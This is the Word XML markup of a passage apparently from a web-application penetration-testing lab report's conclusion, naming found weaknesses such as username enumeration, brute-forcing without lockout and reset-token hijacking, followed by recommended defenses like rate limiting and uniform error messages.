          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Username enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> via predictable error messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A86ECE1" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Credential bruteforcing</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> without lockout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553A6CAC" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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disclosure</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in password-reset responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D67E2C5" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reset-token hijacking</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabling full account takeover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557362B4" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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>These vulnerabilities illustrate the importance of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E63A4" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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>Uniform error messaging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456152A9" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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>Strong password policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ACED32" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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>Rate limiting and account lockouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22145BCD" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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>Secure password-reset workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021289A3" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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>Proper server-side validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C36F49B" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="00395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t>This exercise reinforces key penetration-testing skills relevant to real-world web-application security assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03528F3E" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="00395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411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="5A691127">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF8DA7" w14:textId="77777777" w:rsidR="00273289" w:rsidRDefault="00273289"/>
    <w:sectPr w:rsidR="00273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2DE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1EA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C5257"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="16C01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F4850"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB70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11515"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="134E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72609"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DFB8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95D44"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="62BA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450332">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1405949343">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1209488104">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1159073172">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1520847691">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="407313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411"/>
    <w:rsid w:val="00245904"/>
    <w:rsid w:val="00273289"/>
    <w:rsid w:val="00395411"/>
    <w:rsid w:val="00847DE9"/>
    <w:rsid w:val="00A91508"/>
    <w:rsid w:val="00B44618"/>
    <w:rsid w:val="00FA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23A3D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BA22EC51-CA85-46E4-8167-2082B179B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4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4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4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4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4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4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4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41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41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411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9541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395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4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4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4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4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607</Words>
  <Characters>4213</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>105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Creutz</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Daniel Creutz</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-18T00:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-18T01:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>